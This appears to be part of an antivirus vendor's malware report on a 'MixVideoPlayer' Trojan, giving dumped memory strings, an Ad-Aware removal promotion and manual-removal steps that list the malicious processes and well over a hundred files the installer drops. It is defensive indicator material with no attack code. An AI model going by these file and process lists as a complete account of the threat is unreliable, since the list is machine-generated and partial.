yKERNEL32.DLL

KeySize

ElementMalformedKeyTask

CacheMissReportReceivedTask

wpffontcache_v0400.exe

4.0.30319.1 built by: RTMRel

.NET Framework

4.0.30319.1

MixVideoPlayer.exe_2876_rwx_03D10000_00010000:

PresentationFramework.classic

PresentationFramework.Aero

MixVideoPlayer.exe_2876_rwx_04970000_00009000:

WindowsFormsIntegration

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   mixvideoplayersetup.exe:1192
   WPFFontCache_v0400.exe:3016
   DeleteTasks.exe:2364
   LTV2.exe:2108
   LTV2.exe:2468
   LTV2.exe:1012
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Program Files%\MixVideoPlayer\Languages\ChineseT.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\Swedish.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\Danish.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\Hungarian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\Estonian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\dotNetFx40_Full_setup.exe (30344 bytes)
   %Program Files%\MixVideoPlayer\Languages\Slovak.ini (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\NSISdl.dll (15 bytes)
   %Program Files%\MixVideoPlayer\policy.2.0.taglib-sharp.config (377 bytes)
   %Program Files%\MixVideoPlayer\BrowserWeb.exe (2392 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\SimpleSC.dll (1856 bytes)
   %Program Files%\MixVideoPlayer\references\libreria.png (244 bytes)
   %Program Files%\MixVideoPlayer\Languages\Norwegian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\German.ini (3 bytes)
   %Program Files%\MixVideoPlayer\references\PhotoLoader.dll (784 bytes)
   %Program Files%\MixVideoPlayer\Languages\Slovenian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\PhotoLoader.dll (784 bytes)
   %Program Files%\MixVideoPlayer\Languages\Czech.ini (3 bytes)
   %Program Files%\MixVideoPlayer\references\mixChecker.exe (27704 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\AccessControl.dll (15 bytes)
   %Program Files%\MixVideoPlayer\Languages\Polish.ini (3 bytes)
   %Program Files%\MixVideoPlayer\references\Interop.SHDocVw.dll (5064 bytes)
   %Program Files%\MixVideoPlayer\Languages\Catalan.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\ChineseS.ini (3 bytes)
   %Program Files%\MixVideoPlayer\mixvideoplayer.affcode (3 bytes)
   %Program Files%\MixVideoPlayer\uninstall.exe (3865 bytes)
   %Program Files%\MixVideoPlayer\icon.ico (12536 bytes)
   %Program Files%\MixVideoPlayer\Languages\Thai.ini (5 bytes)
   %Program Files%\MixVideoPlayer\references\extvideo.png (146 bytes)
   %Program Files%\MixVideoPlayer\references\extaudio.png (310 bytes)
   %Program Files%\MixVideoPlayer\Languages\Russian.ini (5 bytes)
   %Program Files%\MixVideoPlayer\references\ffmpeg.zip (946650 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\nsProcess.dll (4 bytes)
   %Program Files%\MixVideoPlayer\Languages\Bulgarian.ini (5 bytes)
   %Program Files%\MixVideoPlayer\Languages\Hindi.ini (6 bytes)
   %Program Files%\MixVideoPlayer\Languages\Latvian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\NLog.dll (14184 bytes)
   %Program Files%\MixVideoPlayer\Languages\Italian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\Korean.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\French.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\Romanian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\icon-uninstall.ico (3616 bytes)
   %Program Files%\MixVideoPlayer\Languages\Vietnamese.ini (4 bytes)
   %Program Files%\MixVideoPlayer\Newtonsoft.Json.dll (16944 bytes)
   %Program Files%\MixVideoPlayer\references\taglib-sharp.dll (15536 bytes)
   %Program Files%\MixVideoPlayer\FrameworkControl.exe (12024 bytes)
   %Program Files%\MixVideoPlayer\references\Newtonsoft.Json.dll (15536 bytes)
   %Program Files%\MixVideoPlayer\Languages\Indonesian.ini (3 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\MixVideoPlayer\Uninstall MixVideoPlayer.lnk (1 bytes)
   %Program Files%\MixVideoPlayer\Languages\HaitianCreole.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Windows\Thumbs.db (1856 bytes)
   %Program Files%\MixVideoPlayer\Languages\Greek.ini (5 bytes)
   %Program Files%\MixVideoPlayer\Languages\Hebrew.ini (4 bytes)
   %Program Files%\MixVideoPlayer\Languages\Finnish.ini (3 bytes)
   %Program Files%\MixVideoPlayer\references\NDde.dll (3616 bytes)
   %Program Files%\MixVideoPlayer\taglib-sharp.dll (15536 bytes)
   %Program Files%\MixVideoPlayer\mixUpdater.exe (13368 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsg2.tmp (183067 bytes)
   %Program Files%\MixVideoPlayer\Snowplow.Tracker.dll (784 bytes)
   %Program Files%\MixVideoPlayer\MixVideoPlayer.exe (82435 bytes)
   %Program Files%\MixVideoPlayer\Languages\Japanese.ini (4 bytes)
   %Program Files%\MixVideoPlayer\Languages\Portuguese.ini (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\System.dll (11 bytes)
   %Program Files%\MixVideoPlayer\Sider.dll (5064 bytes)
   %Program Files%\MixVideoPlayer\Windows\logopeq-icon.ico (9608 bytes)
   %Program Files%\MixVideoPlayer\LTV2.exe (6 bytes)
   %Program Files%\MixVideoPlayer\Controls\ifishplayer-icon2.ico (12536 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsw3.tmp\ZipDLL.dll (6360 bytes)
   %Program Files%\MixVideoPlayer\Languages\Ukrainian.ini (5 bytes)
   %Program Files%\MixVideoPlayer\Microsoft.Win32.TaskScheduler.dll (8560 bytes)
   %Program Files%\MixVideoPlayer\mixvideoplayer.uidnum (23 bytes)
   %Program Files%\MixVideoPlayer\Languages\Arabic.ini (4 bytes)
   %Program Files%\MixVideoPlayer\Languages\Turkish.ini (3 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\MixVideoPlayer\MixVideoPlayer.lnk (1 bytes)
   %Program Files%\MixVideoPlayer\Languages\Dutch.ini (3 bytes)
   %Program Files%\MixVideoPlayer\references\policy.2.0.taglib-sharp.dll (3 bytes)
   %Program Files%\MixVideoPlayer\Languages\English.ini (3 bytes)
   %Program Files%\MixVideoPlayer\Controls\Thumbs.db (1552 bytes)
   %Documents and Settings%\All Users\Start Menu\Programs\Startup\WebBrowserMixVideoPlayer.lnk (1 bytes)
   %Program Files%\MixVideoPlayer\Languages\Spanish.ini (3 bytes)
   %Documents and Settings%\%current user%\Desktop\MixVideoPlayer.lnk (1 bytes)
   %Program Files%\MixVideoPlayer\references\policy.2.0.taglib-sharp.config (377 bytes)
   %Program Files%\MixVideoPlayer\DeleteTasks.exe (10 bytes)
   %Program Files%\MixVideoPlayer\references\Thumbs.db (5 bytes)
   %Program Files%\MixVideoPlayer\Languages\Lithuanian.ini (3 bytes)
   %Program Files%\MixVideoPlayer\policy.2.0.taglib-sharp.dll (3 bytes)
   %Program Files%\MixVideoPlayer\LTVNetSdk.dll (14 bytes)
   %Program Files%\MixVideoPlayer\references\folder.png (472 bytes)
   %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (511 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\show_ads[1].js (7 bytes)
   %Documents and Settings%\%current user%\Cookies\Current_User@n149adserv[2].txt (812 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\mixvideoplayer\log.txt (134 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (326 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ga[1].js (2187 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\MainBanner[1].htm (3 bytes)
   %Documents and Settings%\%current user%\Cookies\Current_User@n149adserv[1].txt (637 bytes)
   %System%\d3d9caps.tmp (1324 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\analytics[1].js (740 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\show_ads[1].js (7 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\arw[1].png (342 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\jquery.min[1].js (3155 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\analytics[1].htm (1 bytes)
   %Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[2].txt (4225 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery.min[2].js (5043 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ga[2].js (2239 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\banner[1].htm (3 bytes)
   %Documents and Settings%\%current user%\Local Settings\Application Data\mixvideoplayer\config\config.ini (252 bytes)
   %Documents and Settings%\%current user%\Cookies\index.dat (15900 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\jquery.min[3].js (4562 bytes)
   %Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[1].txt (3790 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\arw[1].png (342 bytes)
   %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (1024 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\24075845-11900215[1].png (4 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\loading-install[1].gif (7 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\style[1].css (114 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\MixVideoPlayerSetup[1].exe (1792168 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i-download[1].png (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\loadingBar[1].gif (9823 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\msjava[1].dll (465777 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\progress-bar[1].png (1 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\style[1].css (5083 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bullet-short[1].gif (54 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\99bf1249-796b-43b5-839f-99f7def784ae\mixvideoplayersetup.exe (1792168 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
   %System%\wbem\Logs\wbemprox.log (684 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.